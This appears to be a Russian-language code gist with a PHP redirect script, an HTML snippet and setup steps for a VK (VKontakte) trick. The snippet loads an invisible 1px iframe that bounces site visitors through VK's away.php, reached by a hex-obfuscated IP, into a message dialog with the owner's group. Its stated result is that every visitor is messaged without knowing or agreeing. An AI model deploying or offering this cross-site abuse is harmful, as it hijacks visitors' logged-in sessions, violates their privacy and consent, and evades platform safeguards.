UP новая версия
var group_id = 141530628;
айдишник группы
заменить в обоих случаях на адрес своего send.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
<?php | |
if(isset($_REQUEST['1'])){ | |
$id = $_REQUEST['1']; | |
$level1 = "http://sanasol-test.ru/fb/send.php?2={$id}"; | |
header('Location: http://0x57F0A552/away.php?to='.urlencode($level1)); | |
die(); | |
} | |
if(isset($_REQUEST['2'])){ | |
$id = $_REQUEST['2']; | |
$level2 = "https://vk.com/im?sel=-{$id}"; | |
header('Location: '.$level2); | |
die(); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
<!DOCTYPE HTML> | |
<html lang="ru-RU"> | |
<head> | |
<meta charset="UTF-8"> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
var group_id = 141530628; | |
var ifr = document.createElement("iframe"); | |
ifr.style = "opacity: 0;position: absolute;height: 1px;width: 1px;"; | |
ifr.setAttribute("referrerpolicy", "no-referrer"); | |
ifr.src = '//sanasol-test.ru/fb/send.php?1='+group_id; | |
document.body.append(ifr); | |
</script> | |
</body> | |
</html> |
1. Включаем в группе сообщения
2. Пишем приветствие
3. Добавляем код на сайт в любое место
4. Цифры(85297730) заменяем на ID группы. Дефис/минус удалять не надо 🙂
5. Все зашедшие на сайт получают приветственное сообщение от вашей группы.
По лимитам вроде как 250 человек в день.